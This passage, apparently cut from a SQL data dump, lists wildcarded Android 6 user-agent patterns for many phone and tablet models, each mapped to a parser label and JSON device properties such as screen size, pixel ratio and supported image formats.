Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5044T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5044Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5045X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5046D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5046I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5046J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5046U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5046Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5051A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5051D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5051J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5051M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5051X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5056X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5057M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5059) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 506SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 507SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5080A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5080F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5080Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5080X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5085Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5095I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5095K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5095Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 509SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5145A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 562) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 5M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 601SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6039K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6039Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6045I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6045O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6045Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6055A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6055B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6055D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6055K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6055P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 6070K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 640XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 7070X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 8063) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 831C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 9001D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 9001X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; 9003X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A0001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A1-734) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":720,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A101S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A1601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A3-A40) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A466BG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A5002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A502_Aurum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A503 Joy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A503 Optima) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A503-Optima) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A504 Trace) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A505 JOY Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A551 Sky 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 